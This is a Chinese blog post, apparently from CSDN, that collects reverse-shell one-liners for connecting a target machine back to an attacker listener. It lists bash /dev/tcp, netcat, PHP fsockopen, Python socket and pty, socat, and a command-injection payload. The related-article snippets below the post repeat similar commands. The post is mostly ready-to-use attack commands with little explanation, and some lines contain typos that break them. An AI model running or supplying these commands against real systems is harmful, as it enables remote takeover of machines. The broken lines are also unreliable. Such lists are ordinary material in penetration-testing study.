反弹shell

已于 2022-05-14 15:52:07 修改
阅读量4.7k 收藏 2
点赞数 3
文章标签: bash linux 网络
于 2021-12-07 23:11:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45564150/article/details/121780944
版权

反弹 shell的几种方式

linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:
请添加图片描述

bash反弹 shell

靶机:

bash -I >&/dev/tcp/192.168.1.1/9999 0>&1

攻击机:

nc -nvlp 9999

命令注入直接获取一个shell

127.0.0.1&echo 'bash -i >&/dev/tcp/192.168.1.1,9999 0>&1' | bash

调用python直接获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用php建立 socket会话:

正向连接:

php -r '$sock=fsockopen("192.168.1.1",9999);exec("/bin/bash -i <&3 >&3 2>&3");'

反向连接:

php -r '$sock=fsockopen("192.168.1.1",9999);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

python建立socket会话

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

获取一个 交互式的 shell

Python -c 'import pty;pty spawn("/bin/bash")'

socat建立连接

socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:"192.168.1.1",9999
InkTM
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
[网络安全自学篇] 五十八.Windows安全缺陷利用之再看CVE-2019-0708及反弹shell防御措施
杨秀璋的专栏
03-12 1万+
很早之前,我分享过一篇名叫 “Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解” 的博客,主要采用Python代码让目标XP系统蓝屏,但写得不太完善。作者最近一直在学习Windows漏洞利用,包括Msfconsole渗透工具及shell获取,这里我们也回过头来继续分析CVE-2019-0708,利用RDP(EXP)和Metasploit工具反弹shell,并实现Win7远程桌面攻击。希望文章对您有所帮助~
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 3522
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
怎么通过命令注入反弹shellLinux渗透之反弹Shell命令解析
小白渣的博客
03-01 4296
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 Bash 这篇文章的起...
Jenkins反弹shell攻击(AppRun进程,xmrig)
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
05-17 2675
一、服务器环境 Centos 7 2核4G 经典网络 Jenkins服务器 二、排查流程 1.top命令查看服务器负载 top - 16:58:25 up 164 days, 1:36, 3 users, load average: 2.25, 2.49, 2.66 Tasks: 75 total, 2 running, 73 sleeping, 0 stopped, ...
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
CVE-2018-3191 反弹shell
最新发布
05-18
**CVE-2018-3191:反弹Shell漏洞详解** 在信息安全领域,"反弹Shell"是一种常见的攻击手段,常被黑客用于远程控制受感染的系统。CVE-2018-3191是针对这一技术的一个具体安全漏洞实例。这个漏洞可能影响到各种软件或...
阿里云提示进程异常行为反弹SHELL 该怎么处理
网站安全专家
09-01 1413
也希望我们的解决过程分享,能帮到更多的人。当天我们SINESAFE收到客户的电话咨询,客户的平台、APP和H5端、以及后台遭到黑客入侵,并篡改了数据库里面的数据,导致平台的损失过万,详细询问了客户的平台架构以及部署的服务器数量,发现客户用的是Thinkphp架构开发,APP的API接口和H5端以及后台管理都是在该架构的基础上开发的,因为这套代码是客户从买来后找的第三方公司进行的二次开发,第三方开发公司对里面的代码后门并不清楚,很多低价卖源码的,肯定是有利益可图的。...
反弹shell原理与实现
悦分享
08-02 3327
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
linux 常用反弹shell小记
weixin_30535167的博客
02-13 196
在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell。 1.bash反弹shell 本地开启监听 nc -lvvp 8080 受害主机命令 bash -i >& /dev/tcp/192.168.109.131/8080 0>&1 收到反弹回来的shell 2. ...
反弹shell的多种方式
课嗨教育的专栏
04-03 323
升级成半交互式 tty python -c 'import pty; pty.spawn("/bin/bash")' 升级成完全交互式 tty,能用方向键 + tab,就是退出比较麻烦。 python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo fg reset Bash Tested on Ubuntu 10.10 /bin/bash -i >& /dev/tcp/10.10.14.1/44
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4651
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
如何完善反弹shell
shy的博客
04-13 386
在渗透过程中,我发现用nc -e反弹shell一点儿都不好用,我都不会用,特别麻烦,特别容易影响渗透的效率与感情,因此我百度了很多,终于找到了完善反弹shell的方法。 python‐c"importpty;pty.spawn('/bin/bash')" 使用python提供的pty模块,创建一个原生的终端 Ctrl-C)仍然会关闭终止Netcat,完成标签或历史记录也依旧没有 c...
利用python获得更好的shell(解决ls无回显,无法连接sql,/bin/sh: 1: xxx: not found)
qq_15042405的博客
06-08 686
有时候利用rce反弹shell时,经常遇到ls命令没有回显,连接sql后无法形成交互式shell,执行系统常用命令出现/bin/sh: 1: xxx: not found等情况。 1.ls无回显解决方法: 利用python反弹shell python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2352
常用反弹shell技术汇总
反弹shell无法反弹
08-13
您好!关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定端口没有开放,那么反弹shell连接将无法建立。您可以通过扫描目标主机的端口来确定哪些端口是开放的,并调整反弹shell的配置以使用其中一个开放的端口。 3. 网络连接问题:有时候网络连接不稳定或存在其他问题,可能导致反弹shell无法成功。您可以尝试使用其他网络或通过网络工具进行连通性测试,以确保网络连接正常。 4. 权限问题:如果您没有足够的权限来执行反弹shell操作,那么它也可能失败。请确保您具有足够的权限,并尝试以管理员身份运行反弹shell。 请注意,反弹shell是一项潜在的非法活动,我们不鼓励或支持任何非法的行为。以上回答仅供技术讨论和参考,请在合法和合适的环境中使用这些知识。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

InkTM

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值